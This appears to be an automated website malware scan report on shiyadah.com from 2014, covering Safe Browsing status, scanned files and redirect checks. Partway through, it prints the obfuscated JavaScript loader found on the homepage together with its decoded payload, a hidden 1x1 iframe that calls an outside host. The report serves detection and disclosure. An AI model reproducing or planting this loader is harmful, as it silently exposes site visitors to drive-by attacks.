Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shiyadah.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://shiyadah.com/ | 200 OK Content-Length: 1154 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,9,55,53,40,23,1,59,0,0,0,0,0,0,0,41,58,16,26,47,24,35,36,46,48,29,42,62,5,49,7,19,37,57,52,11,45,25,50,4,44,15,0,0,0,0,17,0,27,51,33,2,56,38,14,3,31,61,60,22,43,34,54,12,21,30,13,20,6,28,18,10,8,32);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("VWkI6PpW965SpOvSsFRctrEcshpbd3vSEryQOl546apfOovS_6j1xKEbBhV1wusbBTpbTgjSTCYNxwZjgZLRd62RGPiQ5igRqugegak81PZ0mPHIGTLRSh0RcPgfErefVKybhisNyhkfOd") Decoded script: <iframe width="1" height="1" src="http://hu587tiugi.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>" Antivirus reports:
| ||
http://shiyadah.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://shiyadah.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shiyadah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 01:56:12 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 1154
Content-Type: text/html
Last-Modified: Thu, 17 Feb 2011 03:04:11 GMT
...1154 bytes of data.
GET / HTTP/1.1
Host: shiyadah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 01:56:12 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 1154
Content-Type: text/html
Last-Modified: Thu, 17 Feb 2011 03:04:11 GMT
...1154 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shiyadah.com
Referer: http://www.google.com/search?q=shiyadah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shiyadah.com
Referer: http://www.google.com/search?q=shiyadah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.